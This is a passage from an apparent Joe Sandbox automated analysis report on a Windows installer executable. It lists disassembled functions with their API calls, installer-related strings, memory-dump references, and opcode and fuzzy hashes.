                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                          • API String ID: 1452528299-3038984924
                                                                          • Opcode ID: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                                          • Instruction ID: 0d596443d05caf7374ea98a63d842d8765eee9d82fb477a7c18f0f713548320e
                                                                          • Opcode Fuzzy Hash: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                                          • Instruction Fuzzy Hash: 3601A730E0924896CB14D7AD94412EDBBB48F09304F54C1EFB85CE7382DB780A098B9A
                                                                          Function 0046FC14 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
                                                                          Strings
                                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
                                                                          • Setting NTFS compression on directory: %s, xrefs: 0046FC33
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046FC76
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                          • API String ID: 1452528299-1392080489
                                                                          • Opcode ID: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                                          • Instruction ID: 1ff60dd8eb5a114f2a7af6b3d642365226de0c959c43d8a3966afd89414ec8a0
                                                                          • Opcode Fuzzy Hash: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                                          • Instruction Fuzzy Hash: 5B011730E0824C56CB04D7ADA4412DDBBB4AF4D314F54C5BFA899D7382EA790A0D879B
                                                                          Function 00455D70 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
                                                                          • RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                          • String ID:
                                                                          • API String ID: 4283692357-0
                                                                          • Opcode ID: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                                          • Instruction ID: 990a694f9916720730b0810028faebd1b23d30e86244cf38efb64550af4b0806
                                                                          • Opcode Fuzzy Hash: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                                          • Instruction Fuzzy Hash: 7CF090B274070036EA10B6B65C46F2B12DC8F54745F10883AB500EF2C3D57CDC044629
                                                                          Function 0047C52C Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CountSleepTick
                                                                          • String ID:
                                                                          • API String ID: 2227064392-0
                                                                          • Opcode ID: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                                          • Instruction ID: a2b460aa88ecba94892aad5d964071206a8b0d845d3bc1a6a013ae29a0728730
                                                                          • Opcode Fuzzy Hash: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                                          • Instruction Fuzzy Hash: 6FE02B627C916065C62131BE18C25BF464CCBC3364B24463FF0CCE7242C85D5C4A873E
                                                                          Function 00477C98 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 215268677-0
                                                                          • Opcode ID: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                          • Instruction ID: 672a73815fb629360b1666c66e1be5f1e4265ed7d7d078eef31aabbee9319095
                                                                          • Opcode Fuzzy Hash: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                          • Instruction Fuzzy Hash: 5FF037716447007FD600E6B58D81E5B73DCEB44354F04883A7E94D71C1D678DC08A726
                                                                          Function 00424238 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastActivePopup.USER32(?), ref: 00424244
                                                                          • IsWindowVisible.USER32(?), ref: 00424255
                                                                          • IsWindowEnabled.USER32(?), ref: 0042425F
                                                                          • SetForegroundWindow.USER32(?), ref: 00424269
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                          • String ID:
                                                                          • API String ID: 2280970139-0
                                                                          • Opcode ID: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                          • Instruction ID: 914cdc97238bca482b123af495550876eb6964b08c7fad051248fc704dde4b2b
                                                                          • Opcode Fuzzy Hash: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                          • Instruction Fuzzy Hash: DEE0EC61706636D7AAA2767B2981A9F618D9DC53C434601ABFC04FB386DB2CDC1181BD
                                                                          Function 0040626C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalHandle.KERNEL32 ref: 0040626F
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocHandleLockUnlock
                                                                          • String ID:
                                                                          • API String ID: 2167344118-0
                                                                          • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                          • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                          • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                          • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                          Function 00479BDC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
                                                                          Strings
                                                                          • Failed to parse "reg" constant, xrefs: 00479E44
                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                          • API String ID: 3535843008-1938159461
                                                                          • Opcode ID: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                                          • Instruction ID: 5eaaab04e28549974a1eae9ca1a9eb8293ffddd3d671f6967ea537ac56f3ac17
                                                                          • Opcode Fuzzy Hash: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                                          • Instruction Fuzzy Hash: 81814174E00148AFCF11DF95C881ADEBBF9AF49314F50816AE815BB391D738AE45CB98
                                                                          Function 00482B48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
                                                                          • SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
                                                                          Strings
                                                                          • Will not restart Windows automatically., xrefs: 00482CB2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveForeground
                                                                          • String ID: Will not restart Windows automatically.
                                                                          • API String ID: 307657957-4169339592
                                                                          • Opcode ID: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                          • Instruction ID: 4958210349c6873c441c743532f51790e4d62edc104a08ffbd951144213b1fca
                                                                          • Opcode Fuzzy Hash: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                          • Instruction Fuzzy Hash: 3541F130248240AED711FBA5EE96BBD7BE4EB55304F540CB7E8405B3A2D2FD68419B1D
                                                                          Function 0046CA2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                          • API String ID: 0-1974262853
                                                                          • Opcode ID: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                          • Instruction ID: 55592184c39aac83035684310b8d0626f6b8fe487ab2a4e85d8be474453688ef
                                                                          • Opcode Fuzzy Hash: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                          • Instruction Fuzzy Hash: 49318D30604208DFD711EB99D98ABAA77F5EB05704F5500BBF448AB3A2D7797E40CB4A
                                                                          Function 0047892C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                                          • %s\%s_is1, xrefs: 004789A4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1598650737
                                                                          • Opcode ID: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                                          • Instruction ID: 1902e23b80ae68d1a407740dd401f48df33a1007776b0bbafa0d95379bb3c34b
                                                                          • Opcode Fuzzy Hash: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                                          • Instruction Fuzzy Hash: AF216474B402449FDB01DBAACC556DEBBE8EB89704F91847FE408E7381DB789D018B59
                                                                          Function 0045013C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ExecuteMessageSendShell
                                                                          • String ID: open
                                                                          • API String ID: 812272486-2758837156
                                                                          • Opcode ID: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                          • Instruction ID: 7e6871a26ddddf45a22869efb5a26db0f3e7f81d2927c2b78b58bd6f76e5dadf
                                                                          • Opcode Fuzzy Hash: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                          • Instruction Fuzzy Hash: EE216274E00204AFDB04DFA5C889E9EB7F8EB44705F2085BAB814E7292D7789E44CA48
                                                                          Function 00455264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                                          • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorExecuteLastShellSystem
                                                                          • String ID: <
                                                                          • API String ID: 893404051-4251816714
                                                                          • Opcode ID: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                                          • Instruction ID: ab6e9011ac2a47c3b5942fb44236b8cd8890e3b7caf9c3a2037be21c94c6989b
                                                                          • Opcode Fuzzy Hash: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                                          • Instruction Fuzzy Hash: 3F212370600609AFDB10EF65D8926EE7BE8AF48355F90403AFC44E7281D7789E45CB98
                                                                          Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: )
                                                                          • API String ID: 2227675388-1084416617
                                                                          • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                          • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                          • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                          • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                          Function 0049603A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: /INITPROCWND=$%x $@
                                                                          • API String ID: 2353593579-4169826103
                                                                          • Opcode ID: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                          • Instruction ID: 17582354874f3a564912cfd2224966d9f48ebc88dda7ed38b5aba0a92b935dc2
                                                                          • Opcode Fuzzy Hash: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                          • Instruction Fuzzy Hash: 1111B731A042448FDF01DBA4D892BAE7FE8EB48314F51447BE504E7282D73C9905CB5C
                                                                          Function 0044740C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                                          Strings
                                                                          Memory Dump Source
